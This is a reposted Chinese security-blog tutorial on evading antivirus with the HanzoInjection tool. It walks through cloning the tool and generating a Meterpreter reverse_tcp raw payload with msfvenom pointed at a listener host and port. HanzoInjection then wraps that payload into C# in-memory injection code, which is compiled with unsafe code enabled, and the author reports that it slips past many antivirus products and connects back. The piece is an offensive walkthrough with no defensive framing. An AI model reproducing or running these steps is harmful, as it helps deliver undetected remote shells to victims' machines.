bypassAV_hanzoInjection
source link: http://www.10tiao.com/html/665/201806/2650447378/3.html
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
下载hanzoInjection
git clone https://github.com/P0cL4bs/hanzoInjection.git
使用方式:
3
26
sage: HanzoInjection.exe [Options] [-h] [-e] [-o] [-p] [-b]
the HanzoIjection is a tool focused on injecting arbitrary codes in memory to
bypass common antivirus solutions.
Developer: Mharcos Nesster (mh4x0f)
Email:[email protected]
Site: www.chmodsecurity.com.br
Greetx: P0cL4bs Team { N4sss , MMXM , Chrislley, MovCode, joridos }
-------------------------------------------------------------------
Arguments Options:
OPTION TYPE DESCRIPTION
-e,--execute [.raw] Name of file.bin, payload metasploit type raw
-p,--payload [.raw] Payload meterpreter type [RAW] requered parameter -o
[output]
-o,--output [file.cs] Output generate project file.cs injection memory
payload c#
-b,--binder [NULL] Binder File EXE with encrypt file PE not requered
paramenter
-h,--help [Help] show this help and exit
Example Usage:
HanzoInjection.exe -e payload_meterpreter.bin
HanzoInjection.exe -p meterpreter.bin -o injection_memory.cs
HanzoInjection.exe -b
生成paylaod
1
☁ ~ msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.100lport=4444 -f raw
-o ~/Desktop/test.bin
检测:
使用hanzoInjection生成cs:
1
☁ hanzoInjection [master] wine HanzoInjection.exe -p ~/Desktop/test.bin -o
~/Desktop/test.cs
之后使用vs编译cs:
如果出现错误,修改编译器允许不安全代码。
生成的文件检测结果:
虽然还有报毒,但是已经可以过很多杀软了。测试可以上线:
文章出处:Evi1cg's blog
原文链接:https://evi1cg.me/archives/bypassAV_hanzoInjection.html
你可能喜欢
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK